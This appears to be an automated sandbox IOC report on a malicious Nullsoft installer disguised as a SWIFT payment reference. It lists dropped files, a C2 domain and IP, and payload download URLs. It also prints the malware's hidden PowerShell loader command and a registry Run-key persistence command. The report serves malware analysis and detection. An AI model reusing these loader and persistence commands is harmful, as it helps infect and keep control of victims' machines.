IOC Report
New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe

loading gif

Files

File Path
Type
Category
Malicious
New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
initial sample
malicious
C:\Users\user\AppData\Local\Temp\Vitis.exe
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
dropped
malicious
C:\Users\user\AppData\Local\Temp\medlemskartotek\vejmaterialerne\Profilen127.Aff
ASCII text, with very long lines (58469), with no line terminators
dropped
malicious
C:\Users\Public\Pictures\timetallenes.lnk
MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
modified
C:\Users\user\AppData\Local\Temp\Vitis.exe:Zone.Identifier
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_af3as4dx.pex.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ng2smkti.dbo.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\medlemskartotek\vejmaterialerne\Noncausal.tre
data
dropped
C:\Users\user\AppData\Local\Temp\medlemskartotek\vejmaterialerne\mymarid.ost
data
dropped
C:\Users\user\Pictures\timetallenes.lnk
MS Windows shortcut, Item id list present, Has Relative path, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
dropped
C:\Windows\Resources\sans.lnk
MS Windows shortcut, Item id list present, Has Relative path, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
dropped
There are 2 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe
C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe" -windowstyle hidden "$Nonfading=Get-Content 'C:\Users\user\AppData\Local\Temp\medlemskartotek\vejmaterialerne\Profilen127.Aff';$Bakkants=$Nonfading.SubString(17286,3);.$Bakkants($Nonfading)
malicious
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe" /c "set /A 1^^0
malicious
C:\Users\user\AppData\Local\Temp\Vitis.exe
C:\Users\user\AppData\Local\Temp\Vitis.exe
malicious
C:\Windows\SysWOW64\cmd.exe
C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bortopereringer" /t REG_EXPAND_SZ /d "%Trimmere% -windowstyle minimized $storkenes=(Get-ItemProperty -Path 'HKCU:\Oxylabrax\').Discumber;%Trimmere% ($storkenes)
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bortopereringer" /t REG_EXPAND_SZ /d "%Trimmere% -windowstyle minimized $storkenes=(Get-ItemProperty -Path 'HKCU:\Oxylabrax\').Discumber;%Trimmere% ($storkenes)"

URLs

Name
IP
Malicious
http://pesterbdd.com/images/Pester.png
unknown
malicious
http://nuget.org/NuGet.exe
unknown
http://g-eurasia-ru.com/fan/ZfUdfOc32.binM
unknown
https://aka.ms/pscore6lB
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
http://g-eurasia-ru.com/fan/ZfUdfOc32.binu
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
http://g-eurasia-ru.com/fan/ZfUdfOc32.binZ
unknown
http://g-eurasia-ru.com/fan/ZfUdfOc32.binz
unknown
https://contoso.com/License
unknown
http://g-eurasia-ru.com/fan/ZfUdfOc32.binDomiPhaclg-logistic.com.ua/toys/ZfUdfOc32.binSlanOelmig-pal
unknown
https://contoso.com/Icon
unknown
http://g-eurasia-ru.com/fan/ZfUdfOc32.bin
unknown
http://nsis.sf.net/NSIS_ErrorError
unknown
http://g-eurasia-ru.com/fan/ZfUdfOc32.binA
unknown
http://g-eurasia-ru.com/fan/ZfUdfOc32.binD
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://github.com/Pester/Pester
unknown
http://g-eurasia-ru.com/fan/ZfUdfOc32.binh
unknown
There are 10 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
g-eurasia-ru.com
192.121.162.150

IPs

IP
Domain
Country
Malicious
192.121.162.150
g-eurasia-ru.com
Sweden

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\surmuleri\preeducating
Befolkningsunderlag
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\coloraturas\Uninstall\Faldet170\hundsede
ideales
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Trady
tethydan
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\affringens
sugan
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\slvsmedjernes\Uninstall\Adhsiv165
morbidly
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\rygeannonces\Uninstall\bemeldtes
gekkonidae
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\microvolt
habilitcar
HKEY_CURRENT_USER\SOFTWARE\debut
overpressures
HKEY_CURRENT_USER\SOFTWARE\nekton\plastrendes
bewpers
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\enologies\Uselvstndighed
kniplende
HKEY_CURRENT_USER\SOFTWARE\lakaj
Skllende187
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\Unfelicitousness\Uninstall\Burnsides
circumventions
HKEY_CURRENT_USER\SOFTWARE\troldkrabben
riser
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Tips
unbeauteousness
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\heaumes\Uninstall\Stimulussens\mlkebtte
gaugers
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\euryphagous\Uninstall\safariing
Dobbeltmoralers166
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\forskudsbetalinger\Edderfugl163
Shipside
HKEY_CURRENT_USER\Oxylabrax
Discumber
HKEY_CURRENT_USER\Environment
Trimmere
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Bortopereringer
There are 10 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
8F67000
direct allocation
page execute and read and write
malicious
18C7000
remote allocation
page execute and read and write
malicious
5A0000
heap
page read and write
4AF000
unkown
page readonly
2860000
direct allocation
page read and write
41CD000
stack
page read and write
804D000
stack
page read and write
1E350000
direct allocation
page read and write
83A0000
trusted library allocation
page read and write
6A4E000
stack
page read and write
B69000
heap
page read and write
72C7000
trusted library allocation
page read and write
6BCF000
stack
page read and write
AA9000
heap
page read and write
BA0000
heap
page read and write
4928000
trusted library allocation
page read and write
72C0000
trusted library allocation
page read and write
1DE60000
heap
page read and write
31C0000
heap
page read and write
7310000
trusted library allocation
page read and write
1E4EE000
stack
page read and write
72E0000
trusted library allocation
page read and write
4B36000
trusted library allocation
page read and write
4917000
trusted library allocation
page read and write
2870000
direct allocation
page read and write
49E1000
trusted library allocation
page read and write
2850000
direct allocation
page read and write
4862000
trusted library allocation
page read and write
878000
stack
page read and write
3226000
heap
page read and write
40A000
unkown
page write copy
8170000
direct allocation
page read and write
4910000
heap
page readonly
E30000
heap
page read and write
2489000
heap
page read and write
19A000
stack
page read and write
22C5000
heap
page read and write
2F3E000
stack
page read and write
711D000
heap
page read and write
1E0BE000
stack
page read and write
48CE000
stack
page read and write
831C000
stack
page read and write
7FE0000
trusted library allocation
page read and write
3650000
heap
page read and write
710000
heap
page read and write
7350000
trusted library allocation
page read and write
19A000
stack
page read and write
745000
heap
page read and write
2955000
heap
page read and write
85F0000
trusted library allocation
page read and write
40D0000
direct allocation
page read and write
422000
unkown
page read and write
5B0000
heap
page read and write
7FD0000
trusted library allocation
page read and write
75D0000
trusted library allocation
page read and write
704000
heap
page read and write
2956000
heap
page read and write
400000
unkown
page readonly
8130000
trusted library allocation
page read and write
D1F000
stack
page read and write
E9A000
trusted library allocation
page execute and read and write
8260000
direct allocation
page read and write
4060000
direct allocation
page read and write
AF4000
heap
page read and write
408000
unkown
page readonly
B3E000
heap
page read and write
710000
heap
page read and write
82DC000
stack
page read and write
83E5000
heap
page read and write
719000
heap
page read and write
1DE5D000
stack
page read and write
717D000
heap
page read and write
7300000
trusted library allocation
page read and write
4F14000
trusted library allocation
page read and write
B60000
heap
page read and write
42C000
unkown
page read and write
30FD000
stack
page read and write
69E0000
trusted library allocation
page execute and read and write
34CF000
unkown
page read and write
6D10000
direct allocation
page read and write
408000
unkown
page readonly
497C000
stack
page read and write
49C0000
heap
page execute and read and write
4080000
direct allocation
page read and write
ADB000
heap
page read and write
4140000
heap
page read and write
2952000
heap
page read and write
40A000
unkown
page write copy
7430000
trusted library allocation
page read and write
249D000
heap
page read and write
72F0000
trusted library allocation
page read and write
756000
heap
page read and write
6CE0000
direct allocation
page read and write
295D000
heap
page read and write
63E000
stack
page read and write
40C0000
direct allocation
page read and write
31BE000
stack
page read and write
BC0000
heap
page read and write
2408000
heap
page read and write
72D000
heap
page read and write
712F000
heap
page read and write
40A000
unkown
page read and write
808E000
stack
page read and write
2FA0000
heap
page read and write
71D2000
heap
page read and write
7590000
trusted library allocation
page read and write
847A000
heap
page read and write
3120000
heap
page read and write
2880000
direct allocation
page read and write
715000
heap
page read and write
8150000
trusted library allocation
page read and write
1DD5E000
stack
page read and write
5B97000
trusted library allocation
page read and write
742F000
stack
page read and write
4090000
direct allocation
page read and write
1720000
remote allocation
page execute and read and write
9B000
stack
page read and write
6B0E000
stack
page read and write
7370000
trusted library allocation
page read and write
B49000
heap
page read and write
E48000
heap
page read and write
9AF000
stack
page read and write
240F000
stack
page read and write
70C0000
heap
page read and write
4880000
trusted library allocation
page read and write
6B0000
heap
page read and write
3200000
heap
page read and write
6CA0000
direct allocation
page read and write
22C0000
heap
page read and write
6F90000
heap
page read and write
2B4D000
stack
page read and write
A70000
heap
page read and write
72D000
heap
page read and write
2473000
heap
page read and write
75C0000
trusted library allocation
page read and write
434000
unkown
page read and write
6B8E000
stack
page read and write
85C0000
trusted library allocation
page read and write
2963000
heap
page read and write
3130000
heap
page read and write
4C0000
heap
page read and write
A6D000
stack
page read and write
1E39E000
stack
page read and write
4860000
trusted library allocation
page read and write
1E5EF000
stack
page read and write
40B0000
direct allocation
page read and write
7570000
trusted library allocation
page read and write
E40000
heap
page read and write
67E000
stack
page read and write
B65000
heap
page read and write
A78000
heap
page read and write
71B6000
heap
page read and write
960000
heap
page read and write
6F8E000
stack
page read and write
408000
unkown
page readonly
6ACE000
stack
page read and write
8190000
direct allocation
page read and write
85E0000
direct allocation
page execute and read and write
72D000
heap
page read and write
704000
heap
page read and write
59E1000
trusted library allocation
page read and write
2477000
heap
page read and write
966000
heap
page read and write
6D00000
direct allocation
page read and write
400000
unkown
page readonly
8DC0000
direct allocation
page execute and read and write
4F0E000
trusted library allocation
page read and write
E70000
trusted library allocation
page read and write
8D0000
heap
page read and write
2DBD000
stack
page read and write
8120000
trusted library allocation
page read and write
8486000
heap
page read and write
2FA8000
heap
page read and write
418E000
stack
page read and write
8467000
heap
page read and write
2BFE000
unkown
page read and write
715000
heap
page read and write
73EE000
stack
page read and write
242D000
heap
page read and write
5B8F000
trusted library allocation
page read and write
49D0000
heap
page read and write
2400000
heap
page read and write
72D000
heap
page read and write
4AF000
unkown
page readonly
80E5000
trusted library allocation
page read and write
AF0000
heap
page read and write
8472000
heap
page read and write
42F000
unkown
page read and write
37D0000
trusted library allocation
page read and write
B3E000
stack
page read and write
715000
heap
page read and write
8140000
trusted library allocation
page read and write
40A000
unkown
page write copy
B9F000
stack
page read and write
E37000
heap
page read and write
85D0000
trusted library allocation
page execute and read and write
320B000
heap
page read and write
81B0000
heap
page read and write
6A85000
heap
page execute and read and write
294F000
stack
page read and write
400000
unkown
page readonly
8180000
direct allocation
page read and write
40A0000
direct allocation
page read and write
6F1000
heap
page read and write
3500000
heap
page read and write
70F0000
heap
page read and write
8090000
heap
page read and write
24B0000
heap
page read and write
719000
heap
page read and write
83CE000
heap
page read and write
E00000
heap
page read and write
B01000
heap
page read and write
7FC0000
trusted library allocation
page execute and read and write
7FB0000
heap
page read and write
1E340000
direct allocation
page read and write
400000
unkown
page readonly
5B89000
trusted library allocation
page read and write
8110000
trusted library allocation
page read and write
83E0000
heap
page read and write
4A43000
trusted library allocation
page read and write
4865000
trusted library allocation
page execute and read and write
6B4E000
stack
page read and write
E73000
trusted library allocation
page execute and read and write
4AF000
unkown
page readonly
2F40000
heap
page read and write
2BB0000
heap
page read and write
E60000
trusted library allocation
page read and write
49BE000
stack
page read and write
704000
heap
page read and write
4AF000
unkown
page readonly
7390000
trusted library allocation
page read and write
6F4E000
stack
page read and write
E89000
trusted library allocation
page read and write
2FB0000
heap
page read and write
2EFD000
stack
page read and write
6A80000
heap
page execute and read and write
425000
unkown
page read and write
761B000
stack
page read and write
2890000
heap
page read and write
5A09000
trusted library allocation
page read and write
70DF000
heap
page read and write
2240000
heap
page read and write
408000
unkown
page readonly
24A0000
heap
page read and write
75A0000
trusted library allocation
page read and write
AB0000
heap
page read and write
7123000
heap
page read and write
1E49F000
stack
page read and write
7580000
trusted library allocation
page read and write
7187000
heap
page read and write
401000
unkown
page execute read
7EF60000
trusted library allocation
page execute and read and write
40F0000
heap
page read and write
7550000
trusted library allocation
page read and write
6CF0000
direct allocation
page read and write
2290000
heap
page read and write
317E000
unkown
page read and write
AAD000
stack
page read and write
22B0000
direct allocation
page read and write
5FE000
stack
page read and write
715000
heap
page read and write
401000
unkown
page execute read
427000
unkown
page read and write
6CB0000
direct allocation
page read and write
D20000
heap
page read and write
8160000
direct allocation
page read and write
A40000
heap
page read and write
B10000
heap
page read and write
733000
heap
page read and write
7560000
trusted library allocation
page read and write
2500000
heap
page read and write
6B7000
heap
page read and write
4200000
heap
page read and write
710000
heap
page read and write
490E000
stack
page read and write
E80000
trusted library allocation
page read and write
E74000
trusted library allocation
page read and write
E7D000
trusted library allocation
page execute and read and write
34F0000
heap
page read and write
8409000
heap
page read and write
3222000
heap
page read and write
3050000
heap
page read and write
23F0000
direct allocation
page read and write
5A4A000
trusted library allocation
page read and write
23E0000
direct allocation
page read and write
E50000
trusted library section
page read and write
305B000
heap
page read and write
842B000
heap
page read and write
719000
heap
page read and write
2468000
heap
page read and write
2840000
direct allocation
page read and write
719000
heap
page read and write
7360000
heap
page execute and read and write
401000
unkown
page execute read
75B0000
trusted library allocation
page read and write
AAF000
stack
page read and write
3660000
heap
page read and write
B05000
heap
page read and write
1E320000
direct allocation
page read and write
B5E000
stack
page read and write
5B6000
heap
page read and write
4050000
direct allocation
page read and write
A9D000
heap
page read and write
331F000
unkown
page read and write
7FA7000
stack
page read and write
83C000
stack
page read and write
754D000
stack
page read and write
E20000
trusted library section
page read and write
8AE000
stack
page read and write
35CF000
stack
page read and write
4040000
direct allocation
page read and write
750E000
stack
page read and write
710000
heap
page read and write
7440000
trusted library allocation
page read and write
73A0000
trusted library allocation
page read and write
4070000
direct allocation
page read and write
83C0000
heap
page read and write
8435000
heap
page read and write
1E1BF000
stack
page read and write
80A0000
trusted library allocation
page execute and read and write
6CC0000
direct allocation
page read and write
341F000
stack
page read and write
401000
unkown
page execute read
1E330000
direct allocation
page read and write
83B0000
trusted library allocation
page execute and read and write
8270000
direct allocation
page read and write
244E000
stack
page read and write
69F0000
trusted library allocation
page read and write
CDE000
stack
page read and write
98000
stack
page read and write
7380000
trusted library allocation
page execute and read and write
6CD0000
direct allocation
page read and write
There are 322 hidden memdumps, click here to show them.